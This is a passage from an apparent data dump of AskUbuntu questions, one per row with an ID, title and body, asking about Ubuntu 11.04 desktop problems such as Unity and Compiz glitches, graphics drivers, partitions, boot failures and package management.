t seem to be a way of removing it . edit 2 - i remived the offending package following the instructions here : http : //www.khattam.info/solved-subprocess-pre-removal-script-returned-error-exit-status-2-error-2009-08-04.html i feel a bit dirty but it did work , and no need to reinstall the os .
40337	how to undo move /home into /old_home ?	i accidentally skipped the step `` preparing fstab for the switch '' and moved on to the next step of `` moving /home into /old_home '' under the documentation for setting up a separate home partition here : https : //help.ubuntu.com/community/partitioning/home/moving is it okay to just do the step `` preparing fstab for the switch '' from here or do i have to undo `` moving /home into /old_home '' ? is so , how may i do that ? will editing the fstab file after cd / & & sudo mv /home /old_home & & cd / & & sudo mkdir -p /home harm my computer ?
40340	does not boot after installation on dell precision t3500	i am able to install ubuntu 11.04 , but i have to pass the noahci ( or ahci=off ) parameter to the kernel as part of the installation process . once the installation process is complete the system will not boot . by removing the following items from the kernel line in the grub configuration i can somewhat see what is going on : vt.handoff=7 splash quiet also , i 've been changing the 'gfxpayload ' parameter to 'text ' . under these conditions i can observe the boot process . when i get to the running scripts portion the text font appears to change . it goes from a bright bold white to a more muted , non-bold white . then the screen goes blank and i 'm again stuck . i can ping the machine , but i ca n't ssh in as ssh is not enabled . i have a dell precision t3500 with an nvidia video card with displayport outputs . my problem seems similar to this askubuntu question .
40344	ext4-extended-linuxswap	i have just installed gparted on ubuntu . i should only have 1 partition however it lists it as : partition : file system mount point size /dev/sda1 ext4 / 919.79 gib /dev/sda2 extended 11.72 gib /dev/sda5 linux-swap 11.72 gib the sda1 makes sense , but what is the sda2 and extended mean ? can i delete this an make 1 file system ?
40355	the chrome around my windows appears to have disappeared . any ideas why ?	when my windows are not maximised the title bar disappears and the only way to get hold of the application pane is to alt + click and drag . i am running natty with unity and i have not restarted the machine since experiencing the problem . this is because i have a long running process executing on my machine . is there an option i might have accidentally enabled ? or does it sound like some kind of process crash ? how can i rectify it ?
40358	which is the best place to check the compatibility of video cards ?	i need to look for a laptop that will work flawlessly with ubuntu , i know that intel video cards nearly always have open source driver ( rare exceptions exist ) and that nvidia 's proprietory driver works good , however i have trouble with ati , it has a zillion models , some having open source driver , some only proprietory , which is usually a trainwreck . which is the best place i can check any video card model ( especially ati ) if it has a proper open source driver or not ?
40369	logitech usb headset not working	when i plug my usb headset in , it does not appear as hardware device within the sound preferences . however , it is present in lsusb : bus 003 device 002 : id 046d:0a14 logitech , inc . it works fine in windows and so that would suggest that it is n't a problem with the headset itself . the native audio device in the laptop is listed as : 00:1b.0 audio device : intel corporation cougar point high definition audio controller ( rev 05 ) but i 'm not sure whether this has any bearing on this situation . any suggestions would be great . thanks
40372	how to move ubuntu to an ssd	my current situation is : one hard disk dual boot ubuntu 11.04 and windows 7 . partitions : 100mb windows system thingy 144gb main windows 160gb ubuntu 4gb swap 12gb system restore stuff now i want to install an 80gb ssd and move ubuntu to it . afaik i need to : shrink the 160gb ubuntu partition to 80gb copy it over to the ssd change fstab to mount the ssd as / how do i do the second ? and what do i need to do about grub ?
40377	i don’t want to view photos or listen to music from the dash , how can i change them to something i will use ?	the view photos and listen to music shortcuts in the unity dash are useless to me because i have my photo and music directories organized and i just browse to the what i want to see / hear and open the files from there . i really would like have eclipse and pidgin easily accessible , but not necessarily in the launcher if i’m not running them . i can’t find any settings for what shows up there , and all the searches i’ve done just bring me to people asking about how to change the default program for photos . i’m fine with doing something like editing a config file to get what i want if there’s no settings gui — i just don’t know where to look .
40380	how to set an icon for eclipse ?	i want to set icon for launcher . it has file named icon.xpm , but its being ignored by the icon set wizard . i tried to change it to .ico file , but it is still getting ignore . any ideas ?
40382	how to add a folder to the favorites bar in gnome shell ?	i 'm using gnome-shell 3.0.0.1 , is there a way i can add a folder shortcut or custom launcher ( the same way in regular gnome panels ) to the gnome-shell favorites dock bar ?
40385	how to install and configure sendmail for php	i am running lamp on my ubuntu 10.04 desktop linux and using it as a development machine . i need to send emails from my php pages , but it seems that the sendmail php command needs sendmail installed on the laptop . i understand i can install sendmail by sudo aptitude install sendmail , but do n't know how to configure it as after installing it and restarting apache2 , sendmail from php still does not work and returns no errors at all . i am assuming sendmail needs to be configured after installing it , before it can be used in php . therefore , my question is , how do i install and configure sendmail on ubuntu 10.04 so i can use sendmail via cli at least .
40388	no window manager and no networking	i 'm in a bit of a pickle right now due to a few blunders i made on my ubuntu install . currently , i have no window managers ( so i 'm running from a terminal ) and no networking , wired or wireless . here 's the backstory : i upgraded to 11.04 the other day and decided i did n't like unity one bit . after a bit of googling , i discovered that gnome 3 was available ( not realizing it was still a beta ) and installed it from a ppa . despite the beautiful interface , it did n't work out for me , since i had no internet connectivity . when i realized i could no longer even use unity , i panicked and used apt-get to remove the main gnome 3 packages in the hopes of reversing the damage . instead , this left me with just a terminal . i tried using ppa-purge , but it wo n't work without internet . i 'm relatively sure i can restore unity if i get wired networking back . so my main question is - any suggestions for fixing it ? thanks a bunch ... i 've really gone and done it this time . derek
40392	remove ipod from launcher	as soon as i connect my ipod touch to the computer unity puts it up on the launcher . it shows two icons - one to browse the documents and the other a general device icon . it is just cluttered and i would like to remove it . i tried dragging it away and right clicking . but does n't work . any help ?
40395	how to set a keyboard shortcut for compiz negative screen function ?	i just updated from ubuntu 10.10 to 11.04 . however , now the super + m function does not change my desktop and open windows to a negative view as it previously did . i changed the keyboard shortcut for the compiz neg to ctrl + alt + m , but it still does n't do anything . does anyone have any idea how to make this function work again with 11.04 ?
40397	how to prevent monitor from blinking when i press backspace in the terminal ?	how to prevent the monitor from blinking when you press backspace when there 's no text left to delete in the terminal ?
40398	installing wireless modem , commands , connecting to internet , get packages	hi , im newbie in ubuntu 11.04. i installed ubuntu 11.04 on my machine ( dell inspiron 1564 ) . my wireless adapter is dell wireless 1397 mini ( broadcam ) . i found a driver package for linux in my device support site and downloaded it . it named ( hybrid-portsrc_x86_32-v5_100_82_38.tar.gz ) . now i want to set it up in ubuntu , note that i have no internet access in ubuntu os . how should i unpack and install this package contents ? i read a lot of pages about my question but i couldent be success . tell me wich commands must i learn ? how use commands ? i just know a little ( sudo , xvzf , cd ... ! ) some other packages i downloaded are ( ubuntu-codecs-pack-10.10.tar.gz ) and ( broadcom-wl-4.80.53.0.tar.bz2 ) and ( scanmodem.gz ) . i exrracted codecs pack and found some .deb files , by double clicking on each file `` ubuntu software center '' window appears and by click on install button i installed codeck ( s ) . but it dont work ... i cant play music or movie files . ( note : im an exprienced advanced '' win '' user ) poor english ... !
40400	how do i show blueproximity 's icon in the panel ?	i just upgraded to natty and am getting used to the new interface . i depend on blue proximity for locking my desktop when i leave my office . after upgrade i no longer see the icon in the panel area . i tested and it is working but i have no idea how to configure it now . how do i get the icon back and configure it ?
40401	why write to an external disk i only looked at ?	i mounted an external disk , looked at its contents in the file browser , and then did `` safely remove drive '' . surprise : a small window pops up stating that it 's writing to the disk and warning me not to unplug the drive until it 's done . what the heck is there to be written ? i did create any files , or change any file names , etc .
40411	why does /bin/sh point to /bin/dash and not /bin/bash ?	as far as i understand bash is the default shell in ubuntu , so why does /bin/sh point to /bin/dash ?
40412	system bar not showing when using the macbuntu theme	i think i really need your assistance in this.i 've installed ubuntu 10.10 and this mac theme and so far it works fine . this morning i upgraded to 11.04 and it also went well . i just realise some of the effects were gone . so i open compizconfig settings manager , i 've tried to enable the destop cube and the expo and it prompted me of desabling somethings here and there . honestly i went fast could n't undo what i 've done and i realize the new application launcher and the system bar were n't showing properly , so i decided to restart my machine.after that 'bummer ' , nothing were like before.no system bar , no application launcher , not menu bar for any of my applications not even for the console . how i 'm going to solve this one this time . thanks for reading this and specially for helping out .
40414	ati scaling issue with hdmi	i have crossfire ati radeon hd 5770 's . installed the proprietary driver and decided to install the newest driver from the site . now there is a huge scaling issue that ati always does with hdmi connections . it does it on hd tv 's and monitors alike . also a windows issue , but on the windows catalyst control center there is a slider than lets you change the value of the scaling to 0 % . so now i 'm stuck with this annoying black bar around my screen even though the resolution is set to 1920x1080 please help update : newer versions of the catalyst driver ( like 12.3 and 12.4 ) include the overscan and under scan scaling to fix the black boxes . it should be located under the display manager sub menu in the catalyst control center . mine was labeled dtv ( probably for digital tv or something ) and it was the last tab ( called adjustments . ) by default mine was set to underscan 10 % .
40416	why is /lib/libc.so.6 missing ?	find | grep libc.so.6 reveals that it 's in /lib/i386-linux-gnu/libc.so.6 , but a script i was running expected it to be directly under /lib , so why is n't there at least a symlink ? would i risk breaking anything if i put a symlink there ?
40420	how do i show ibus indicator ?	how to show ibus indicator in ubuntu 11.04 ? it disappears .
40421	default file manager changed , ca n't change back	( using ubuntu 11.04 ) i tried to open a torrent file in chrome , and it asked for my default application , so i clicked transmission , and then i got an error : `` failed to execute default file manager , failed to execute child process `` transmission '' ( no such file or directory ) . '' now if i click on any shortcut on the unity bar , such as the trash folder or the icon for my portable hard drive , i get this error , as well as with any download or folder from chrome or firefox . i ca n't seem to figure out how to fix this , as there seems to be no easy way to do it .
40423	how can i set an animated background ?	i want an animated desktop wallpaper on ubuntu . for example , the animated enlightenment background . how does one achieve this ?
40426	ubuntu 11.04 unity / classic load fails - remains at background without toolbars / windows	important : ubuntu classic ( without effects ) works . i am trying to get unity to work . have the following problem with ubuntu 11.04 ( had it with 10.10 too , but disabling kms or using the fglrx driver fixed it - cant remember exactly which ) . but now since the radeon driver is better than it used to i want to use it + fglrx performance kinda sucks . so , ubuntu boots normaly until the login screen . after login it shows the background , the mouse is shown and it just remains there , it does not load the anything else . it does not freeze . i can move the mouse and can go into text console ( ctrl+alt+f1 ) . it does not work on ubuntu profile ( unity ) or on the ubuntu classic ( gnome + effects ) profile . i even tried installing gnome3 from their ppa , but it does not finish loading either ( just like the other two ) . now my hardware : notebook toshiba satellite m40 , ati radeon x600 ( 128mb ) video card . i have n't been able to find any errors in dmesg or other logs . update1 : alt+f2 does not work . nothing pops up . there is a gnome panel loaded ( i see the process in the text console ) when trying ubuntu classic ( with effects ) . even the unity panel service loads when i use the ubuntu profile . i get the impression that something does n't finish loading ( in both ubuntu and classic with effects ) because if i move the mouse over to where the toolbar would be i get the working mouse . the thing is with fglrx i get an error when trying to load unity , saying to use classic because of lack of hardware . but with the radeon driver i do n't get that error , they seem to start loading but never end . they just hang . it would be nice if radeon driver would allow me to use effects/unity/gnome3 since unity seems to run ok on an intel 945m express integrated video card notebook . hope updates to the driver/unity will fix my problem . $ /usr/lib/nux/unity_support_test -p opengl vendor string : x.org r300 project opengl renderer string : gallium 0.4 on ati rv380 opengl version string : 2.1 mesa 7.10.2 not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity supported : yes since the unity script says that i should be running unity i am leaving this question open . found lots of bugs related to this ( i think ) like ubuntu bug 777341 and ubuntu bug 758482 and lots of questions relating to it on this very site / other sites . so i will assume that this is a problem that will be resolved in ulterior ubuntu updates . update 2 : fiddling with compiz plugins ( gnome plugin or unity plugin ) in ccsm does not do the trick either . the same goes for unistalling compiz/unity and reinstalling it . am starting to get the feeling that this is not a thing easy to fix , and only a driver ( radeon/r300g/gallium ) / compiz / unity ubuntu update will fix this . will probably close question soon . feel free to leave your opionions / fixes here and i will try them and answer . any ideeas ? i am willing to try everything to get it to work .
40427	how do i change the trash keyboard shortcut ?	after upgrading to natty i found that the win+t shortcut is mapped to the trash . i changed it to run a terminal in the keyboard shortcuts , but it did not change the mapping and i do not see where this shortcut is coming from . how do i remove this shortcut ?
40433	automatically recreate partition if corrupt	i 'm going to be embedding ubuntu on an embedded device . i 'm using a combination of aufs and a read only root to ensure that my root fs does n't get corrupt . however , i want to be able to store logs , so i 'm making a special rw partition for /var/log . the device is going to undergo hundreds of power failure events . in the event that the partition gets corrupted due to power failure , i want the system to work properly anyway . i 'd like the partition to automatically get reformatted in case of corruption . is there an easy way to configure this ?
40434	banshee and totem are crashing ... how to fix it ?	both banshee and totem are crashing as soon as i launch them . before this i was watching a dvd using totem , the dvd had a lot of scratches , and hence totem crashed . after that whenever i try to launch totem or banshee neither one of them start up . i 'm using natty narwhal .
40444	after upgrade 10.10 - > 11.04 in vbox , vm will not boot	i was running 10.10 64-bit quite happily in virtualbox 4.0.4 64-bit on windows-7 professional 64-bit sp1 . this morning i upgraded vbox to the latest 4.0.6 ; 10.10 still worked just fine . the i did an online upgrade to 11.04 and now the ubuntu vm will not come up . it just sticks at the ubuntu screen with a row of dots and that is it . how can i troubleshoot this so i can get it to boot . i really do n't want to have to do a clean install if i can avoid it . thanks .
40447	how do i get quick lists in unity shipped in 11.10 ?	i have delightfully seen the list of quick-lists for major applications ( firefox , chrome , libre office , banshee , etc . ) thriving in these days for ubuntu natty . it is a great idea that is really useful and help many to simplify their workflow . my question is : will these quick-lists be included ( and of course improved ) by default in ubuntu oneiric ? by improved i mean adding a dynamic quick-list for the home folder icon in the launcher , for example ( the one that changes every time you change your bookmarks in nautilus ) .
40450	installed gmate but themes and plugins now showing up in gedit	i am installing gmate on ubuntu 11.04 ( gnome 3 ) : sudo apt-get install gedit-gmate but gedit is untouched ( there should appear new themes and plugins ) .
40453	package management of installed system from live environment	a quick question - would appreciate a quick answer - is there a way to install packages to a system on hdd from a usb/cd/dvd live environment ? edit though i would love a quick answer , it does n't necessarily have to be simple , if the only workable solution is possibly a little difficult/complicated . i 'm thinking of somehow changing the target directory of dpkg to the hard disk instead of the live environment or something . of course , i do n't know how to do that or even if it 's possible , hence the question . hope my input helps me get help .
40457	keyboard and touch-pad stopped working after shutting down the computer while it was installing updates	when i boot my notebook , the touch-pad and the keyboard do n't respond . the last thing i did before shutting down was killing the terminal that was running a sudo apt-get install because i had to go . i tried to follow the start ubuntu in recovery mode but the second screen ( select the root shell option ) does not appear in my computer , it runs some process and then it freezes i have the ubuntu livecd and i can mount my hard drive from there but i 'm not sure what commands to run from there . thanks in advance for any help .
40459	how to install empathy 3.x ?	is it possible and if yes how , to install empathy 3.0.1 and above in ubuntu 11.04 ?
40461	what is the compiz option `` number of desktops '' for ?	what is the number of desktops setting for in compizconfigsettingsmanager > general options > desktop size ? there are options for horizontal/vertical virtual size which change the size of your desktop , but number of desktops does n't seem to do anything . example :
40463	is there any way to initiate `` urgent animation '' of an icon on the unity launcher from command line ?	it would be great if one could use it in the terminal for announcing that some time intensive job is done , e.g . `` apt-get dist-upgrade ; urg-anim '' .
40468	nautilus does not open a file for view when it has the execute permission	am trying to open some html , php , js and css files i copied to /var/www . if they have the execute permission ( allow execute file as program ) option set i can not open them with gedit which i did normally in ubuntu 10.10 and tested yesterday installing 10.10 to make sure . if i remove the execute option it works and opens with gedit . i also set nautilus to run executable text files when they are opened in the nautilus preferences ( behavior section ) .
40471	where can i find the log files for mounting disks ?	i understand if i boot from a live cd i can see all the system logs under system > administration > file log viewer i have a major error with a disk not mounting and i want to trace i tback to the last time it did work and what may have corrupted the ext4 filesystem on it . so within the file log viewer where do i start examining ?
40474	what are some good budget ubuntu-compatible digital cameras ?	or is there a resource on the web that lists the ones are ubuntu compatible ? i 'm thinking of ordering this one from polaroid http : //consumerelectronicsreviews.net/polaroid-cia-1237rc-digital-camera-review-b003e47fwu/
40477	where are unity settings stored ?	i want to dig into the unity application launchers . where do these setting reside ?
40478	opera widget installer starts every time	i am wondering why does an opera widget installer show up every-time i run opera ? . i already purged it and re-installed to no avail . i tried looking everywhere within opera to see if i could disable it and found none . trying to activate the icon also does not work .
40482	why do n't applications opened as root use global menu ?	why do applications like synaptic ( and other that need root privilege ) have their menus in the window instead of top panel ? is it going to change or will it stay like that to indicate that user is on root privileges ?
40485	how do i edit the shortcuts in the nautilus elementary side bar ?	today i install ubuntu 10.04 and nautilus-elementary . i mounted 5 folders in home folder from my home server with nfs . please look at the picture : i have 3 questions : 1 ) how can i remove not all , but some mounted folders from left part of nautilus-elementary ? i marked it on picture . 2 ) how can i remove hard drive icons from mounted folders ? i marked this icons on picture too . 3 ) how can i set it so that mounted folders do n't appear on the desktop ? sorry for my english : )
40486	deactivate html display in incoming emails in thunderbird	i often get html emails , i would like to just display them in plain text . how can i disable any html/script rendering ?
40488	why are emblems disabled in the unity launcher ?	i have seen screenshots with emblems and bug reports like this suggest that emblems were there at some point but they no longer work and there does not seem to be a way to set them in the libunity api . is this an intentional decision or a temporary situation until they work correctly ? emblems would be useful in particular for dropbox and ubuntu one . anyone have any info ?
40493	how to remove window decoration from firefox 4 ?	basically i want to know how to remove the window decoration in firefox 4 using compiz . i successfully removed window decoration in opera , i just needed to add this line ! ( name=opera ) in the window decoration option . however it did n't work as well for when i tried the same thing to remove window decoration from firefox 4 . so do anyone know how to do that ? update i found this nice guide how to fix it nicely http : //www.webupd8.org/2011/03/firefox-4-get-tabs-in-title-bar-like.html
40494	how do i install altitude ? ( .sh file , game )	i 've been trying to install the altitude.sh file i got from altitudegame.com . but i do n't know how to install it . and it is not in the software center either . i found the game here .
40502	switching to ctrl+alt+f1 and back to desktop ( ctrl+alt+f7 ) : blank screen and garbled display	go to tty1 with control + alt + f1 . go back to desktop with control + alt + f7 screens stays blank . cursor changes from an arrow to a hand . when i then close and re-open the lid the screen comes back up but is seriously garbled . i need to minimize all applications to make them proper . the desktop does not refresh though and requires logging out and in . nvidia version 173 is active . what is the best way of triaging this ?
40503	resize large images with mogrify ( imagemagick ) but leave small images unaffected	images can be resized using mogrify from the imagemagick suite : `mogrify -resize 256x256 *.jpg` but this will resize images so that the largest dimension is 256px , including images that are smaller than 256px to begin with ( like 100x100px avatars ) . how can i exclude the smaller images from being affected ? i.e . i want the largest dimension to be no more than 256px ( preferably i will be able to do this with imagemagick suite , or at least without installing anything additional ) .
40504	low contrast font color after upgrading 10.04 to 11.04	after upgrading from ubuntu 10.04 to 11.04 , the font on the top panel have a very low contrast and is hard to read .
40512	i need the default set of software sources to recover my installation	i just had the default ones . they are all gone . i ca n't install any software at all . i am using kubuntu 11.04 x86 . i have no idea why they disappeared . they just did . : / how do i get the default software sources back ? ( i know the sudo add-apt-repository command , but i need to names of the default repositories )
40513	how can i change the text color of the unity top panel ?	i made a gtk theme and my panel black but the text color ( globalmenu , clock ) stays dark and i do n't found out how to turn it readable . where is the text color of the panel defined ? thanks .
40517	root access in natty	how to access root in natty ? usually , i use this methode for login as root sudo password root but in natty this methode not work . there a solution ?
40518	how to kill the ubuntuone daemon ?	the ubuntuone daemon is eating 100 % of my cpu . i contacted the ubuntuone support but while they are looking for a solution , i 'd like to kill it so it does n't disturb my work . i ca n't kill -9 it , as it will respawn imidiatly under a new pid . i did removed it from my start up app settings , but it 's still running at start up .
40519	pitfalls of using an old home directory with a new install ?	i 've been unsuccessful with a natty upgrade , in this sense : i 'm unable to use anything but a metacity theme ( `` ubuntu classic ( no effects ) '' ) . so i lost all my compiz effects , the most valuable of which , for me , was the grid layout tool . i think the problem is confused radeon/ati driver issues -- fglrx was dead on arrival with the update , and falling back to the generic ati driver gets me metacity but not compiz . i 'm now considering preserving my /home directory and doing a clean install of natty on my system drive . unity works decently well on a usb drive boot -- not that i 'm especially fond of it , but i want to give it a fair shake . presumably it will work with a clean install . but i 'm frankly concerned about all the hidden gnome and x configuration files in my restored home directory . when i plop my old homedir onto a new 11.04 system install with all my old packages , what 's going to happen ? ( amd64 , rv710 radeon hd 4550 , dual monitors )
40524	using variables from a text file in scripting	i 'd like to use a command line program ( specifically geotifcp ) which takes file_a.tif and file_a.tfw and outputs file_b.tif . basically it combines two files of the same name with different file extensions and oututs the new file . i 'd like to figure out how to batch out a few thousand of these things . i 've created lists of all these files using basic ls > output commands . i 'm not necessarily looking for an answer targeted at this program but more at scripting in general . i 'm also not looking for you to write this for me , just give me a shove in the general direction please . thanks for any help !
40531	wubi.exe wonât start	i 'm currently using win7 64bit . i right clicked `` wubi.exe '' and chose `` run as administrator '' , then nothing happened . i have `` ubuntu-10.04.2-desktop-i386.iso '' and `` wubi.exe '' in the same folder . thanks .
40532	virtualbox start problem	hi , i have problem with virtualbox as i installed from usc in natty . but , i have installed virtualbox-ose-dkms what wrong ? see picture .
40536	why does n't dash respect the main menu categories ?	i created some launchers using the main menu application , and sorted them , for instance in `` games '' . they are well listed in the unity dash when i click on `` all installed applications '' . however they are not listed in the dash category called `` games '' . is this a bug ? how do i change it ? i have version 0.2.46-0ubuntu3 of unity-place-applications .
40537	cx_oracle on 64bit architecture	i am using ubuntu 10.10 64bit and i am trying to install cx_oracle for python3 . i managed to install oracle xe itself from a deb , but it is 386 version . when i try to install cx_oracle through easy_install3 i get : /usr/bin/ld : can not find -lclntsh and before that : /usr/bin/ld : skipping incompatible /usr/lib/oracle/xe/app/oracle/product/10.2.0/ what i can do to have cx_oracle installed ?
40538	i uninstalled compiz and now the unity panels has disappeared	this is not my original question where they were completely transparent and are just not there . i have reinstalled ccsm , but they are still not there . i have tried unity -- reset which i thought would help but it says that unity is not there . i an ccsm in unity and i could n't even turn on and off unity . why is it doing this and how can i stop it ? i know the shortcut keys for terminal and ccsm in ubuntu so i can adapt from there and in the gnome classic side . i have had lots of trouble with natty and kind of do n't like it . i tried to uninstall ccsm for some more hard drive space not knowing that it was so closely attached to the os . i reinstalled it i think i deleted some crucial part of unity that control the panels . i now need to install unity . i tried install unity which did n't work and i need some command .
40540	can i map some key combination to the suspend function ( it should also work for waking up the machine from the suspended state ) ?	i 'm using an external keyboard for my laptop . the keyboard ( usb ) does not have a suspend button . this means that i have to keep opening my laptop 's lid ( i do n't want to do that very often as i 'm also using an external monitor ) in order to wake the laptop up from the suspended state . can i map some key combination to wake the laptop up from the suspended state ? note that it may not be as trivial as it seems , as it has to work for waking the laptop up and likely gnome shortcuts and similar things will not work . likely it has to be some lower level thing , but what ( if at all possible ) ? ps : i 'm using ubuntu 11.04 64 bit
40541	how does gdm configuration work ?	there are at least two ways to configure gdm i know of : is the /etc/gdm/custom.conf file that can be either hand edited or edited throu gui gdmsetup . autologin and timed login are configured here . are the gconf schemas under /apps/gdm/ those can be edite with gconf-editor running either as root or as a normal user . i guess editing it as a casual user does not have any impact since gdm runs as root . sound among other things can be turned off here . are there any other ways ? gdm refuses to let me autologin ( on a fresh natty install ) ( it does not ask for password , it merely wants that i select myself as a user at the login screen even though i am the only user on this computer ) . other interesting thing is that even if i purge gdm , its settings ( including the custom.conf ) do not change . therefore there seems no way to reset gdm 's settings . btw : my custom.conf is as follows ( drew is my user ) : [ daemon ] timedloginenable=false automaticloginenable=true timedlogin=drew automaticlogin=drew timedlogindelay=1 defaultsession=gnome edit : ha , maybe it is not a configuration issue after all but a bug : https : //bugs.launchpad.net/ubuntu/+source/gdm/+bug/753707
40542	is the compiz widget layer still available ?	there used to be an option to activate the compiz widget layer in ccsm , but in ubuntu 11.04 i ca n't find it anymore , is it still available ? i need it for screenlets .
40543	how to search for files by tags ?	i can tag files with nautilus but have n't found a solution to find files by tags so far . tracker-search-tool does n't offer to search for tags , nor does nautilus , nor any other application i 'm aware of . just upgraded to 11.04 .
40547	can i change the icon size in dash ?	has anyone found a way to resize the icons in the dash in natty or oneiric ?
40549	how can i deal with file association in different application ( not in nautilus ) ?	maybe i do n't understand the system . upgraded to ( reinstalled ) ubuntu 11.04 . is there any way the applications can use something that i set in nautilus , or it 's just a wrong idea about the usage ? in nautilus the file association works great , easy , handy and so on ... my first problem was when installed chromium . downloaded a file , a popup ask for assocation , set nautilus . and it only opens folder , for any file show an error : it is not a direcrory . ok , so i thought google chrome changed , because previously .pdf open acrobat , .torrent open vuze and so on . but now i have to open nautilus on download folder with it , than select and open the preferable application by manually and ca n't use any automatism i used to . then in gnome commander , it not followed the default association i set in nautilus . ok maybe it is commander fault . use it 's own . then in calibre , the `` read '' use again this default `` ca n't open its not a directory '' error so it 's seems to me the applications not using well this file associations or i really do n't understand the aim of file associations system ( mime , .desktop files , ... ) if there is no solution i think i have to search some program ( if any exist 's ) which can identify and launch application and set as default instead nautilus .
40553	how to use a zenity progress bar with cclive	i tried to use a zenity progress bar with cclive . i 'm writting a script to download web videos files and i wan na see the progression of the download . but when i try something like $ cclive < url > 2 > & 1 | zenity -- progress but when i execute the command line but it not seems to work . any idea of how i can do that ? br , [ edit ] cclive have this kind of output : cclive http : //www.youtube.com/watch ? v=youtubevideo checking ... ... ... ... . ... ... ... .done . youtubevideo.flv 2.5m 75.8k/s 00:09:29 5 % so i need to send the last part to sdout but i dont know how . else and about pulsate , we ca n't see th progression with this option , and i really need it ... so i will not using pulsate for this script . think that the paste | zenity -- progress after commands - will not work . you know that it 's loaded only at the end of downloading . i try to use zenity with -- percentage parameter , and i know the best way to check state of process . in my script i know size of file . size_t= $ theoretical_size_of file # i do n't know where are from you take full size of your file . i know it in myself script . size_r=`du -b /tmp/ $ filename` perc= $ [ $ size_t/ $ size_r*100 ] where should i write zenity -- progress -- percentage= $ perc and i think that it should be a loop , cause du -b continiously changing ...
40559	dansguardian out of date ?	is dansguardian still up to date ? the last release was in 2009 and there seems to be no active development on it . are there any major bugs holding it back ? mind web filter http : //code.google.com/p/mindwebfilter/ seems promising , but a little on the unstable side . i am looking for a web filter that can handle at least 300 or so users in a school . they currently use squidguard , which was also last released in 2009 .
40560	how can i set desktop icons to auto-align to the right side of the screen ?	now that unity has the bar on the left side of the screen , i find that it ends up obscuring desktop icons since desktop icons auto align top-bottom/left-right . to correct this i need to constantly keep dragging icons to the right so that they 're not underneath the bar , but this is n't an elegant solution as new icons will be placed as far top-left as possible . is there a way i can set the desktop icons in ubuntu to auto-align on the right side of the screen ? for example , top-bottom/right-left ?
40565	switched graphics cards and lost unity	i was having serious xorg freezing problems with my ati graphics card - but unity was loading . so i removed it in favor of a new nvidia card . during the initial boot-up before i could install the nvidia drivers , i got a message that said `` your hardware can not support unity , so you will be loaded into classic ubuntu '' . since then i 've installed the official nvidia drivers and everything is running great , but i ca n't get unity to restart . every time i reboot or login / logout i still get gnome , even when i 'm picking `` ubuntu '' from the login menu . any suggestions ?
40567	how do i format code from the web using vim ?	for example , to render : while ( head == tail ) { head++ ; a [ head ] = 0 } into while ( head == tail ) { head++ ; a [ head ] = 0 }
40569	higher resolutions unavailable with 2.6.38-8 kernel	after upgrading to natty and the 2.6.38-8 kernel i could no longer obtain the 1920x1080 resolution available in maverick with 2.6.35-22 . in fact the boot occasionally hung . however , after selecting the remaining 2.6.35-22 kernel , the high resolution was available . i then made the mistake of completely reinstalling , but could never get the higher resolutions with 2.6.38-8 , no matter what i did . e.g . trying the nvidia proprietary driver , creating an xorg.conf . even from the command line using xrandr -- newmode `` 1920x1080_60.00 '' 173.00 1920 2048 2248 2576 1080 1083 1088 1120 -hsync +vsync xrandr -- addmode dvi-i-1 1920x1080_60.00 xrandr -- output dvi-i-1 -- mode 1920x1080_60.00 all i would get would be a blank screen and the monitor reporting no input . ( low resolutions displayed fine with xrandr . ) i could actually add the 1920x1080 to the already existing probe-reported resolutions in the pool of available resolutions , but choosing it would give the blank screen . in the end i installed the 2.6.35-22 kernel again . the high resolution is back . for a while there , staying up all night and trying many things , i thought that a new video board or monitor might be needed , but deep down , i knew that they were both ok. my question is - `` is this some bug involving the latest kernel , that will go away , or if this persists in future kernels , is there a way to make sure that i can keep my native resolution ? ''
40571	how to keep programs from launching maximized ?	every time i launch a program , say firefox , it starts maximized , how can i keep this from happening . its so ridiculous that they have this as the default .
40572	sometimes my wifi on my thinkpad x201 stops working and i have to restart . any workaround ?	i heard that you can use modprobe somehow to reload the wifi driver . but i 'm not sure what driver i 'm using . how do i find this out and what 's the command to reload the wifi driver into the kernel ?
40574	is there a way to un-group chrome `` application shortcuts '' in unity so they appear as standalone programs ?	i have used google chrome `` application shortcuts '' to make quick links in the unity launcher to access facebook , twitter and a tv guide . the problem arises when more than one of these links or a chrome browser window are open at the same time . the application shortcuts all group under the banner of whichever shortcut was opened originally and not their corresponding icons in the launcher . is there a way to make them group under their original application headers with multiple chrome windows open ? ex : http : //img190.imageshack.us/img190/1305/screenshotufr.png
40575	how to customize file filtering in unity dash	i 'm getting used to a new way of working in unity and am really enjoying it . the hardest thing i face now is tweaking it so that it works as nicely as possible . on the face of it , customisation is very limited . super+f - > filter to show documents . hmmm . the most common document format i use after .txt files is .lyx files . they really are documents . they look a bit unhappy down in the 'other ' category . is there any way to change this ? what i would really like is to make documents the default , because 'recent ' gets completely filled up with photos .
40582	how do i use an activated ( but not in use ) driver ?	under system > administration > additional drivers it shows that i have a driver active but not in use . how can i activate it ? this window-
40584	install ubuntu one on *ubuntu	what packages do i require to install ubuntu one on ubuntu with other des ? i ca n't use the regular ubuntu on this seriously old desktop . i just need enough for the backend to function in the background and sync me files . xfce uses gtk+ , so what package should i install for the frontend ?
40585	can i use email to upload files into my ubuntuone account ?	it would be nice to be able to just email in info to my ubuntuone account for retrieval later .
40589	second monitor does n't work on an intel gm965	i have intel corporation mobile gm965/gl960 integrated graphics controller ( primary ) ( rev 0c ) and when i plug a vga or hdmi cable i ca n't see the second monitor and the i only see a mess main monitor , like this screenshot http : //ubuntuone.com/p/rbo/ .
40590	desktop cube , compiz , and gnome . bad mix ?	i 've been using compiz fusion under the gnome environment happily with 10.10 maverick meerkat , but when 11.04 natty narwhal came along , it started giving me problems with windows missing a title bar . i finally got the effects to work and the title bars back , at the cost of : not being able to switch between workspaces on the workspace switcher undraggable windows , even with the alt-drag method i checked online , and nothing seems to give me any relevant answer . i asked around on # ubuntu on irc , and a user suggests it might be a bug with the nvidia card . ( i assume it would be the nvidia driver that i used with 10.10 with the intel integrated graphics ) . anybody has any input on how to deal with this issue ? i could bear with it ( since i 'm just using metacity ) . if there is no absolute way , then my last resort would be to downgrade to 10.10 .
